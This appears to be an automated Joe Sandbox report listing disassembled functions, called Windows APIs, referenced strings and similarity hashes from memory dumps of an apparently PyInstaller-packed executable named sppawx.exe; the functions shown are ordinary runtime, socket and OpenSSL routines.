Function 00007FF79A312810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF79A3128EA

Strings

ERROR, xrefs: 00007FF79A31286F
Error, xrefs: 00007FF79A3128DD
[PYI-%d:%ls] , xrefs: 00007FF79A312868

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: e74d699b85bd072155c6ab6c3068ce818dbb823c0799ebde9350cc438ab1150d
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 91219F62B09B4192F660EB65B8847EAB3A4EB88784F80013EEE8D57659DF3CD645C710

Function 00007FFEDD277714 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32 ref: 00007FFEDD2777B8

Strings

socket.gethostbyname, xrefs: 00007FFEDD277771
idna, xrefs: 00007FFEDD277743
et:gethostbyname_ex, xrefs: 00007FFEDD27774D

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: gethostbyname
String ID: et:gethostbyname_ex$idna$socket.gethostbyname
API String ID: 930432418-574663143
Opcode ID: d44dcbc1450e0ece8082216fb5d0cb223c8fcd31ccd8769a345dab2558ff02f1
Instruction ID: 0b74dc766762d9c7234b281fdde7508319d9dfc71d1d28dad41d2f5afa335467
Opcode Fuzzy Hash: d44dcbc1450e0ece8082216fb5d0cb223c8fcd31ccd8769a345dab2558ff02f1
Instruction Fuzzy Hash: 4F213061B18B82A2EB309B52E8446AE6360FBC8BE4F484133DE4D47F64EE7CE105C700

Function 00007FFEDD278304 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

inet_pton.WS2_32 ref: 00007FFEDD278343

Strings

is:inet_pton, xrefs: 00007FFEDD27831F
illegal IP address string passed to inet_pton, xrefs: 00007FFEDD278361
unknown address family, xrefs: 00007FFEDD278398

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: inet_pton
String ID: illegal IP address string passed to inet_pton$is:inet_pton$unknown address family
API String ID: 1350483568-903159468
Opcode ID: 2e0364c41fc58222871f2a02cab5da7e9107dcf4eb12ef4afe779620dd439db4
Instruction ID: c53b2d061d37e7fd5fee25b3049c1e2b3b86d2d3a44af12d4c6bb8bdf365039d
Opcode Fuzzy Hash: 2e0364c41fc58222871f2a02cab5da7e9107dcf4eb12ef4afe779620dd439db4
Instruction Fuzzy Hash: E321FC71A18A43A6EA70DB15E8510BD7371FFC4B65F584433E54E86AB4EF2CE505C700

Function 00007FFEDD2780B4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FFEDD278108

Strings

s:inet_aton, xrefs: 00007FFEDD2780C0
illegal IP address string passed to inet_aton, xrefs: 00007FFEDD27811E
255.255.255.255, xrefs: 00007FFEDD2780D6

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: inet_addr
String ID: 255.255.255.255$illegal IP address string passed to inet_aton$s:inet_aton
API String ID: 1393076350-4110412280
Opcode ID: d3a0a141b8c8351c1f65ff41e06b6c15ce8ad099c8e127dd07fa3a748cb9a68d
Instruction ID: c3b71c2cdcd9fd015f2431c38e82311a615e555470d2e43ff5b5dc10306bcaa8
Opcode Fuzzy Hash: d3a0a141b8c8351c1f65ff41e06b6c15ce8ad099c8e127dd07fa3a748cb9a68d
Instruction Fuzzy Hash: 0401FB61A08A43A2EA30AB29E8401BD6371FFC5BB5F684133D61E86DB4FF2DD449C700

Function 00007FFEDD277D9C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FFEDD277DEF

Strings

htons: can't convert negative Python int to C 16-bit unsigned integer, xrefs: 00007FFEDD277DC1
htons: Python int too large to convert to C 16-bit unsigned integer, xrefs: 00007FFEDD277DE3
i:htons, xrefs: 00007FFEDD277DA8

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: htons
String ID: htons: Python int too large to convert to C 16-bit unsigned integer$htons: can't convert negative Python int to C 16-bit unsigned integer$i:htons
API String ID: 4207154920-997571130
Opcode ID: 7a52ab40b72408e01dadb9ee8914cffdd2d056b2ea03b7ad5085676dabdceb2a
Instruction ID: 74038dbdbb7ea2a6692f6f45ab4c3dc12e50eedee5003c247d79c4b802b76bf5
Opcode Fuzzy Hash: 7a52ab40b72408e01dadb9ee8914cffdd2d056b2ea03b7ad5085676dabdceb2a
Instruction Fuzzy Hash: AAF0E764A08643A1EA349B16E89017C2360BFC5765F980433C54E9B9B0FF6DE408D310

Function 00007FFEDD278434 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FFEDD278487

Strings

ntohs: can't convert negative Python int to C 16-bit unsigned integer, xrefs: 00007FFEDD278459
i:ntohs, xrefs: 00007FFEDD278440
ntohs: Python int too large to convert to C 16-bit unsigned integer, xrefs: 00007FFEDD27847B

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: htons
String ID: i:ntohs$ntohs: Python int too large to convert to C 16-bit unsigned integer$ntohs: can't convert negative Python int to C 16-bit unsigned integer
API String ID: 4207154920-2476431691
Opcode ID: 43cc41ed7b1d004c9105da6575980c76dd7ba6c7d41bc1c10554f12c0e6f6707
Instruction ID: 1581d4db6460ba4f8f886dddc4fe13a84ecff93ed414d8ed9602a47f63e720a6
Opcode Fuzzy Hash: 43cc41ed7b1d004c9105da6575980c76dd7ba6c7d41bc1c10554f12c0e6f6707
Instruction Fuzzy Hash: FFF0F964F08643B1EA349B15E8A407D63A0BFC8BA6F980033C54E96DB4FE6CE408D301

Function 00007FF79A32C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF79A32C68F
WriteFile.KERNEL32 ref: 00007FF79A32C957
WriteFile.KERNEL32 ref: 00007FF79A32C99D
GetLastError.KERNEL32 ref: 00007FF79A32CA53

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 6f13d7355a447b337cb2b16aa368540a50fe4dc5cc010ef18627a4f7018a9e19
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: D0D1E172B1AA818AF720DF75D4402ACB7B1FB44798B84826EDE5D97B89DE38D006C350

Function 00007FF79A32CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A32CFBB), ref: 00007FF79A32D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A32CFBB), ref: 00007FF79A32D177

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 6995a6c4d7836f3c3ade9fecc8060f629bbd5eb12901d578d04cdac9b6905bf3
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: B091B322E1A65189F7B0AF7594402BDBBA0FB44BC8F94417DDE4E57A95CF38E442C720

Function 00007FF79A32F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF79A32FAEC
_get_daylight.LIBCMT ref: 00007FF79A32FAFD
_get_daylight.LIBCMT ref: 00007FF79A32FB0E
_isindst.LIBCMT ref: 00007FF79A32FBD9

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 3792dfb13cff3f18d9881d019c0e66cdf3257075df389e5363ed49343d3db61d
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 3051E372F0A1118BFB38EF3499516BCB7A1AB4435CFD1427DDE1E92AE5DB38A4118610

Function 00007FF79A3257EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF79A32581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF79A325881
GetLastError.KERNEL32 ref: 00007FF79A325912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A325724), ref: 00007FF79A32595E

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: e89e7d9330ac4f7a19c0994c40f32e66db41e33101acb9eb9cc5a0035b14d378
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: BC519E22E0A6418AFB20EF71D4503BDB3A5AB48B58F94847DEE4D97A89DF3CD5418720

Function 00007FFEDD271060 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

VerSetConditionMask.NTDLL ref: 00007FFEDD2710CA
VerSetConditionMask.NTDLL ref: 00007FFEDD2710D9
VerSetConditionMask.NTDLL ref: 00007FFEDD2710E8
VerifyVersionInfoA.KERNEL32 ref: 00007FFEDD27110E

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: 52014d617bdbf1a23e849bdeaec756294a92b9dcc7fe6566fb8264fe441ab811
Instruction ID: e8c640c615f12464291ce0109130d36ae4625b9dd78b63b835c0430043da4dfd
Opcode Fuzzy Hash: 52014d617bdbf1a23e849bdeaec756294a92b9dcc7fe6566fb8264fe441ab811
Instruction Fuzzy Hash: A6314D36A19742A5EA70DB21E8187AD73A0BBC4BA0F584136DD5E46BA4EE3CE645C700

Function 00007FF79A3120C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF79A3120F4
SetWindowLongPtrW.USER32 ref: 00007FF79A312116
GetWindowLongPtrW.USER32 ref: 00007FF79A312140
InvalidateRect.USER32 ref: 00007FF79A312160

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 341753ab018fe6a76de596b9a199baeba66350a323dafa424fae5e7309806819
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 8211E921E0D14242F6A4EBBBE5492B9F251EB84784FC4417CEB4907B89CD2DD8D18224

Function 00007FF79A31D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF79A31D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF79A31D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF79A31D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF79A31D0D6

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: f2298fdaefd2b869abe530aa26f401fead0b331a83ba4b977d153f7c8e5205c0
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: E5115A22B19F058AFB10DF71E8492B973A4FB19758F840E39EA2D867A4DF3CD1548350

Function 00007FF79A335B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79A3317D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A331803

_get_daylight.LIBCMT ref: 00007FF79A335CA4
_get_daylight.LIBCMT ref: 00007FF79A335CB5

Strings

?, xrefs: 00007FF79A335C35

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction ID: 9b0d6ec61e2f200a216c3a4e1c6f7b63006c807f338435d4fb72607c3c5f3780
Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction Fuzzy Hash: 5341E512E0E6824AFB74AB359401379F690EB80BA8FD4427DEE5C06ED5DE3CD441C710

Function 00007FF79A329084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3290B6

Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF79A31CC15), ref: 00007FF79A3290D4

Strings

C:\Users\user\Desktop\sppawx.exe, xrefs: 00007FF79A3290C2

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\sppawx.exe
API String ID: 3580290477-2372293429
Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction ID: f3b8e03180fc3f0568613b12359a417318771e9c3ad5632761333a91334faff2
Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction Fuzzy Hash: 9A415B32A0AB1686FB64EF36A8810B8B794EB44790B95507DED4D43B85DE3CE481C360

Function 00007FF79A32CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF79A32CDBF
GetLastError.KERNEL32 ref: 00007FF79A32CDE1

Strings

U, xrefs: 00007FF79A32CD6B

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 56927b0d103b8bcfc167e0774e2848b129515644c4a115c5d3f743e5f2fec9f7
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: ED419322B19B8581EB609F35E8443A9B7A0FB98794F844039EE4D87B98EF3CD411C750

Function 00007FFEDCC1DDC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

SSL_SESSION_new, xrefs: 00007FFEDCC1DE0D, 00007FFEDCC1DEC2
..\s\ssl\ssl_sess.c, xrefs: 00007FFEDCC1DDEF, 00007FFEDCC1DE19, 00007FFEDCC1DECE, 00007FFEDCC1DF1D

Memory Dump Source

Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true

Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
